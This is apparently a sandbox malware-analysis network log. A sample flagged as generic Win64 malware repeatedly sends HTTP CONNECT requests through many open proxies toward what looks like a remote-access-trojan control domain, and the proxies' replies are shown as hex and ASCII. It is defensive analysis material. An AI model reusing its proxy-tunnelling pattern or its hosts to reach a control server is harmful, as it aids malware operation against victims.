3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1280192.168.2.45351151.161.33.206130037284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.109030962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1281192.168.2.454005208.109.14.49114267284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.114142895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.866553068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.069816113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163928032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.366744041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.569724083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.757306099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.069329023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:04.553723097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1282192.168.2.45407438.162.8.9731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.114167929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.612176895 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1283192.168.2.454028138.36.199.1441537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.114615917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1284192.168.2.454087157.185.157.151265897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.119112968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1285192.168.2.45408238.162.25.14831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.120173931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.645823002 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1286192.168.2.45284942.200.196.20880807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.132531881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.856574059 CET72INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1287192.168.2.45410638.162.3.19831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.134737968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.649117947 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1288192.168.2.453839111.40.62.19990917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.150300026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.853532076 CET325INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.1
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1289192.168.2.454041163.172.147.89163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.155049086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.851805925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846486092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.660404921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366677999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.039084911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.238125086 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1290192.168.2.453414113.11.131.14656787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.156933069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.163428068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.257149935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366461992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1291192.168.2.45349851.158.122.48163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.164381027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257096052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366637945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366386890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.366297007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.366199017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:11.381865025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:35.506850004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:23.506901026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1292192.168.2.4540603.9.71.16731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.168699980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.461462975 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1293192.168.2.453991103.204.55.22110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.169543028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1294192.168.2.45403843.131.245.216156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.182547092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1295192.168.2.452358160.153.245.187351387284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.185791969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257101059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366637945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366414070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.366292953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.366287947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:11.381901979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:35.506885052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:23.508313894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1296192.168.2.454067147.75.34.86100107284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.195142984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.498953104 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1297192.168.2.454061162.55.87.4855667284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.195143938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.504936934 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 